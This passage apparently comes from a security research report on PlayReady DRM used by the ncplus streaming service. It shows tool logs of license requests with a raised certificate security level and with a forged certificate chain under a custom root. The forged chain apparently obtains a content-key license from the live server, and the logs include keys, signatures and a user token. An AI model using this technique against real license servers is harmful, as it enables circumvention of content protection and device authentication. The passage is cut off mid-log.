TVOD ASSET id: ctitzm4567954 title: Pan T. (4K) title_original: PAN T. allow: 31.12.2022 year: 2019 duration: 101 min price: 9.99 PLN vat: 23 url: http://r.cdn-ncplus.pl/vmp-ncplusgo04-voddashdrm/UHD_21024918/UHD_21024918.mpd ``` However, some other check was conducted instead. The security level of the client device cert was increased to `SL3000` (default for devices authorized to play 4K content) and an attempt was made to obtain license to the non-4K asset. This is illustrated by the log below: ``` msprcp> set SECLEVEL SL3000 msprcp> devcert generating new cert, device changed or not initialized ### CERT - random 0000: be e2 7c bf 64 aa c0 c9 4c d6 0f f2 8a 05 e1 b4 ..|.d...L....... - seclevel 3000 - uniqueid 0000: 2c 24 1b 10 43 99 e0 33 30 41 34 30 37 32 44 38 ,$..C..30A4072D8 - pubkey_sign 0000: 1f 34 53 e7 68 e2 4f 0a 86 3c 02 60 2d 17 e4 24 .4S.h.O..<..-..$ 0010: cf 12 8f 96 6b 6d 29 a7 be 71 f1 14 89 e5 78 ad ....km)..q....x. 0020: 77 37 5e fe ba e9 93 f1 bb f3 79 b2 7f 1e 08 00 w7^.......y..... 0030: 86 fd 1b 30 e4 cf 33 36 82 cc a2 e2 b8 ef 9c a1 ...0..36........ - pubkey_enc 0000: d2 96 26 1e 5f 0b f2 4c c0 73 4d 76 c8 10 ac ef ..&._..L.sMv.... 0010: 7b 49 2c 16 04 07 8a 51 9c 6f 54 58 6c bf be df {I,....Q.oTXl... 0020: ea a2 6c f7 29 cc 0f 74 75 d2 20 bd cf 64 fa 69 ..l.)..tu....d.i 0030: fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5 70 df ca 0d .....f......p... - digest 0000: ad 80 a5 d2 03 9d de e5 5e ea 4a 58 5a c9 e3 c9 ........^.JXZ... 0010: 9f 7a df c6 d9 22 47 cf 9f 45 ae a9 3c 62 6d e2 .z..."G..E.. maninfo -A ctitmim568003 - downloading manifest MANIFEST: content\ctitmim568003\Manifest.ism SmoothStreamingMedia MajorVersion: 2 MinorVersion: 0 TimeScale: 10000000 Duration: 47820400000 [1h 19m 3642s] ProtectionHeader SystemID: 9A04F079-9840-4286-AB92-E65BE0885F95 WRMHEADER keylen: 16 algid: AESCTR kid 0000: 04 d4 55 6e 65 f9 57 47 a3 04 f9 34 09 14 67 78 ..Une.WG...4..gx la_url: https://api-ncplus.drm.insyscd.net/rightsmanager.asmx ds_id: 0000: 79 f0 04 9a 40 98 86 42 ab 92 e6 5b e0 88 5f 95 y...@..B...[.._. StreamIndex Type: audio Name: Polski TimeScale: 10000000 Chunks: 2391 QualityLevels: 1 Url: QualityLevels({bitrate})/Fragments(Polski={start time}) QualityLevel Index: 0 Bitrate: 125436 FourCC: AACL CodecPrivateData: 1190 SamplingRate: 48000 Channels: 2 BitsPerSample: 16 PacketSize: 4 AudioTag: 255 StreamIndex Type: video Name: video TimeScale: 10000000 Chunks: 2392 QualityLevels: 5 Url: QualityLevels({bitrate})/Fragments(video={start time}) QualityLevel Index: 0 Bitrate: 400000 FourCC: AVC1 CodecPrivateData: 000000016742C015D901E08FEB01100000030010000003032E200030D400086478A8C01E2C5C900000000168CB8DC8 MaxWidth: 480 MaxHeight: 270 QualityLevel Index: 1 Bitrate: 600000 FourCC: AVC1 CodecPrivateData: 000000016742C01ED900C83BF88C0440000003004000000CB80800249F00064978A8C01E2C5C900000000168CB8DC8 MaxWidth: 800 MaxHeight: 450 QualityLevel Index: 2 Bitrate: 1000000 FourCC: AVC1 CodecPrivateData: 000000016742C01FD90040049B01100000030010000003032E06000F4240029FF8A8C01E3064900000000168CB8DC8 MaxWidth: 1024 MaxHeight: 576 QualityLevel Index: 3 Bitrate: 2000000 FourCC: AVC1 CodecPrivateData: 00000001674D401FF200A00B76022000000300200000065C50001E8480053FF151803C60C4480000000168EBEDC8 MaxWidth: 1280 MaxHeight: 720 QualityLevel Index: 4 Bitrate: 2499968 FourCC: AVC1 CodecPrivateData: 000000016764001FACE4014016EC0440000003004000000CB8100009896000347DE2A30078C188900000000168EBEDC9C0 MaxWidth: 1280 MaxHeight: 720 msprcp> getlicense -A ctitmim568003 - loading cached manifest - generating license req XML key (AES/CBC) iv 0000: 48 69 b8 f5 a3 dc 1c ee 30 ea 2c 04 5d de 6e c5 Hi......0.,.].n. key 0000: 57 7c 79 ad fd 93 be 07 c3 d9 09 e9 27 87 ed 8a W|y.........'... nonce 0000: 6d 51 28 2a d8 c5 1a a7 cc 34 2f 03 1c 89 45 34 mQ(*.....4/...E4 NONCE bVEoKtjFGqfMNC8DHIlFNA== KEYDATA /3xTymd6IO+C5+3oQgJT6FF6WaDGGs83MwOn3s1NI3PqZH7VPlTy3ZBxKT6+fRvRLa02Z5UvOBgCwlavlR2XFeaIQdwTUkP93T6ikwDWZXUWRvCUefpL1boUANTCok0z1slCtadY7se7ECHRz2BxenhcAfSTxmP+p1hoxNu+07A= CIPHERDATA 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 XML DIGEST OFYxtpcMsG0kr8YN5/7WvN4ChEORGK2d2/09JpEtWX4= ecdsa digest 0000: 04 95 66 ba b0 e5 e0 69 13 02 bb de 69 60 61 d5 ..f....i....i.a. 0010: 46 cb c5 1a 3f e3 65 89 c2 65 f2 71 2e 98 fc 11 F...?.e..e.q.... signature - r: 277ca8d09a8e5ceedb15c07e73acd8da0bfafcfedb683718b4f5e60cea0f72a6 - s: 8b771e1097c703f3dc66be965869ed4a61b1c03e496ed5a132896f7e67a0e5f3 XML SIGNATURE J3yo0JqOXO7bFcB+c6zY2gv6/P7baDcYtPXmDOoPcqaLdx4Ql8cD89xmvpZYae1KYbHAPklu1aEyiW9+Z6Dl8w== PUBKEY HzRT52jiTwqGPAJgLRfkJM8Sj5ZrbSmnvnHxFInleK13N17+uumT8bvzebJ/HggAhv0bMOTPMzaCzKLiuO+coQ== - sending license req to: https://lsp1.ncplus.pl/kms/proxy error: cannot get license, see [content\ctitmim568003\debug\lic_resp.txt] for information ``` This test failed - which likely means that the cert level of the whole chain gets verified at the license server side or the request (or protocol) in use was different. ### SCENARIO 6 (AN ATTEMPT TO USE FAKE CERT CHAIN) The integrity of the certificates chain used for device identity is protected through ECC signatures. For that purpose, each cert in a chain contains the signature computed against `SHA256` digest of a certificate data. The public part of the ECC key against, which the signature should be verifeid is attached at the end of the certificate data (past the signature). This create a potential of building a custom certificate chain (with a custom Microsoft PlayReady root certificate). A test for such possibility has been implemented (`MSPR_FAKE_ROOT` variable). A sample fake certificate chain can be seen below: ``` msprcp> set MSPR_FAKE_ROOT 1 msprcp> devchain generating new cert, device changed or not initialized CERT CHAIN: null ### CERT - random 0000: be e2 7c bf 64 aa c0 c9 4c d6 0f f2 8a 05 e1 b4 ..|.d...L....... - seclevel 2000 - uniqueid 0000: 2c 24 1b 10 43 99 e0 33 30 41 34 30 37 32 44 38 ,$..C..30A4072D8 - pubkey_sign 0000: 1f 34 53 e7 68 e2 4f 0a 86 3c 02 60 2d 17 e4 24 .4S.h.O..<..-..$ 0010: cf 12 8f 96 6b 6d 29 a7 be 71 f1 14 89 e5 78 ad ....km)..q....x. 0020: 77 37 5e fe ba e9 93 f1 bb f3 79 b2 7f 1e 08 00 w7^.......y..... 0030: 86 fd 1b 30 e4 cf 33 36 82 cc a2 e2 b8 ef 9c a1 ...0..36........ - pubkey_enc 0000: d2 96 26 1e 5f 0b f2 4c c0 73 4d 76 c8 10 ac ef ..&._..L.sMv.... 0010: 7b 49 2c 16 04 07 8a 51 9c 6f 54 58 6c bf be df {I,....Q.oTXl... 0020: ea a2 6c f7 29 cc 0f 74 75 d2 20 bd cf 64 fa 69 ..l.)..tu....d.i 0030: fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5 70 df ca 0d .....f......p... - digest 0000: ad 80 a5 d2 03 9d de e5 5e ea 4a 58 5a c9 e3 c9 ........^.JXZ... 0010: 9f 7a df c6 d9 22 47 cf 9f 45 ae a9 3c 62 6d e2 .z..."G..E.. maninfo -A ctitmim597698 - downloading manifest MANIFEST: content\ctitmim597698\Manifest.ism SmoothStreamingMedia MajorVersion: 2 MinorVersion: 0 TimeScale: 10000000 Duration: 36440533334 [1h 0m 3644s] ProtectionHeader SystemID: 9A04F079-9840-4286-AB92-E65BE0885F95 WRMHEADER keylen: 16 algid: AESCTR kid 0000: e6 3f 5a 69 2f 8d 49 4b 86 20 17 43 3b 13 b7 ca .?Zi/.IK...C;... la_url: https://api-ncplus.drm.insyscd.net/rightsmanager.asmx ds_id: 0000: 79 f0 04 9a 40 98 86 42 ab 92 e6 5b e0 88 5f 95 y...@..B...[.._. StreamIndex Type: audio Name: Polski TimeScale: 10000000 Chunks: 1823 QualityLevels: 1 Url: QualityLevels({bitrate})/Fragments(Polski={start time}) QualityLevel Index: 0 Bitrate: 125434 FourCC: AACL CodecPrivateData: 1190 SamplingRate: 48000 Channels: 2 BitsPerSample: 16 PacketSize: 4 AudioTag: 255 StreamIndex Type: video Name: video TimeScale: 10000000 Chunks: 1823 QualityLevels: 5 Url: QualityLevels({bitrate})/Fragments(video={start time}) QualityLevel Index: 0 Bitrate: 400000 FourCC: AVC1 CodecPrivateData: 000000016742C015D901E08FEB01100000030010000003032E200030D400086478A8C01E2C5C900000000168CB8DC8 MaxWidth: 480 MaxHeight: 270 QualityLevel Index: 1 Bitrate: 600000 FourCC: AVC1 CodecPrivateData: 000000016742C01ED900C83BF88C0440000003004000000CB80800249F00064978A8C01E2C5C900000000168CB8DC8 MaxWidth: 800 MaxHeight: 450 QualityLevel Index: 2 Bitrate: 1000000 FourCC: AVC1 CodecPrivateData: 000000016742C01FD90040049B01100000030010000003032E06000F4240029FF8A8C01E3064900000000168CB8DC8 MaxWidth: 1024 MaxHeight: 576 QualityLevel Index: 3 Bitrate: 2000000 FourCC: AVC1 CodecPrivateData: 00000001674D401FF200A00B76022000000300200000065C50001E8480053FF151803C60C4480000000168EBEDC8 MaxWidth: 1280 MaxHeight: 720 QualityLevel Index: 4 Bitrate: 2499968 FourCC: AVC1 CodecPrivateData: 000000016764001FACE4014016EC0440000003004000000CB8100009896000347DE2A30078C188900000000168EBEDC9C0 MaxWidth: 1280 MaxHeight: 720 msprcp> set SERIAL DGBD0123456789ABC msprcp> set MAC AABBCCDDEEFF msprcp> devcert generating new cert, device changed or not initialized ### CERT - random 0000: be e2 7c bf 64 aa c0 c9 4c d6 0f f2 8a 05 e1 b4 ..|.d...L....... - seclevel 2000 - uniqueid 0000: ee fc 8e 99 43 de ce 32 33 41 34 35 36 37 44 38 ....C..23A4567D8 - pubkey_sign 0000: 1f 34 53 e7 68 e2 4f 0a 86 3c 02 60 2d 17 e4 24 .4S.h.O..<..-..$ 0010: cf 12 8f 96 6b 6d 29 a7 be 71 f1 14 89 e5 78 ad ....km)..q....x. 0020: 77 37 5e fe ba e9 93 f1 bb f3 79 b2 7f 1e 08 00 w7^.......y..... 0030: 86 fd 1b 30 e4 cf 33 36 82 cc a2 e2 b8 ef 9c a1 ...0..36........ - pubkey_enc 0000: d2 96 26 1e 5f 0b f2 4c c0 73 4d 76 c8 10 ac ef ..&._..L.sMv.... 0010: 7b 49 2c 16 04 07 8a 51 9c 6f 54 58 6c bf be df {I,....Q.oTXl... 0020: ea a2 6c f7 29 cc 0f 74 75 d2 20 bd cf 64 fa 69 ..l.)..tu....d.i 0030: fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5 70 df ca 0d .....f......p... - digest 0000: ad 80 a5 d2 03 9d de e5 5e ea 4a 58 5a c9 e3 c9 ........^.JXZ... 0010: 9f 7a df c6 d9 22 47 cf 9f 45 ae a9 3c 62 6d e2 .z..."G..E.. getlicense -A ctitmim597698 - loading cached manifest - generating license req XML key (AES/CBC) iv 0000: 48 69 b8 f5 a3 dc 1c ee 30 ea 2c 04 5d de 6e c5 Hi......0.,.].n. key 0000: 57 7c 79 ad fd 93 be 07 c3 d9 09 e9 27 87 ed 8a W|y.........'... nonce 0000: 6d 51 28 2a d8 c5 1a a7 cc 34 2f 03 1c 89 45 34 mQ(*.....4/...E4 NONCE bVEoKtjFGqfMNC8DHIlFNA== KEYDATA /3xTymd6IO+C5+3oQgJT6FF6WaDGGs83MwOn3s1NI3PqZH7VPlTy3ZBxKT6+fRvRLa02Z5UvOBgCwlavlR2XFeaIQdwTUkP93T6ikwDWZXUWRvCUefpL1boUANTCok0z1slCtadY7se7ECHRz2BxenhcAfSTxmP+p1hoxNu+07A= CIPHERDATA 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 XML DIGEST BuFDPnPrqUbmF/GYrt6mJELuauILzEqBgbf194KVWfs= ecdsa digest 0000: 88 6f a0 93 d6 48 0a 5e b5 20 18 43 62 fc 23 af .o...H.^...Cb.#. 0010: 2b c4 50 ed ea cf 13 cd 55 5d 37 04 d0 ea 1c 99 +.P.....U]7..... signature - r: 277ca8d09a8e5ceedb15c07e73acd8da0bfafcfedb683718b4f5e60cea0f72a6 - s: efbad841225aef654af8c59aa593085eb25dddd39e9566643b08935aaca2813d XML SIGNATURE J3yo0JqOXO7bFcB+c6zY2gv6/P7baDcYtPXmDOoPcqbvuthBIlrvZUr4xZqlkwhesl3d056VZmQ7CJNarKKBPQ== PUBKEY HzRT52jiTwqGPAJgLRfkJM8Sj5ZrbSmnvnHxFInleK13N17+uumT8bvzebJ/HggAhv0bMOTPMzaCzKLiuO+coQ== - sending license req to: https://lsp1.ncplus.pl/kms/proxy LICENSE CUSTOM DATA UserToken: 135abf9b-7006-46f2-9b3f-52f5d79f361a-stb BrandGuid: 448ab54c-d127-45f6-b651-4c59aee2f431 LicenseType: NonPersistent BeginDate: 2022-07-19T10:36:38.0130303 ExpirationDate: 2022-07-21T10:36:38.0130303 ErrorCode: 0 TransactionId: auto:56 XMR LICENSE version: 3 attr: 0001 OuterContainer attr: 0036 Unknown data 0000: 00 00 00 39 00 00 00 18 d8 27 66 78 a6 c2 be 44 ...9.....'fx...D 0010: 8f 88 08 ae 25 5b 01 a7 ....%[.. attr: 0002 GlobalContainer attr: 000d Unknown data 0000: 00 01 .. attr: 0032 DWORD_Versioned data 0000: 00 00 00 41 ...A SecurityLevel level: SL2000 attr: 0009 KeyMaterialContainer ContentKey key_id 0000: e6 3f 5a 69 2f 8d 49 4b 86 20 17 43 3b 13 b7 ca .?Zi/.IK...C;... v1: 1 v2: 3 enc_data_len: 0080 enc_data 0000: 73 43 41 d1 29 3c e4 21 24 a2 27 a3 2f 6c 42 7d sCA.)<.!$.'./lB} 0010: 8f 85 66 70 36 64 34 62 9b e7 9c f6 b7 cf e2 18 ..fp6d4b........ 0020: 59 f5 5a 26 8b 43 f3 26 ee ec cf 39 f7 f5 e4 82 Y.Z&.C.&...9.... 0030: 39 29 4f 23 55 2d 71 b5 99 76 d9 5a 3b 40 01 32 9)O#U-q..v.Z;@.2 0040: 09 2b f4 eb eb e7 42 e6 c3 60 08 1a 2c f0 91 4b .+....B.....,..K 0050: a0 4c 9e 79 71 bd 38 b6 d6 5e 68 ca 85 48 d7 75 .L.yq.8..^h..H.u 0060: b6 21 d1 08 e5 3a 88 1c a6 de b1 15 01 47 a3 a5 .!...:.......G.. 0070: bc fc 5a de 94 65 36 f3 5a f4 fe 77 c9 6f c2 b2 ..Z..e6.Z..w.o.. attr: 002a ECCDeviceKey data 0000: 00 01 00 40 d2 96 26 1e 5f 0b f2 4c c0 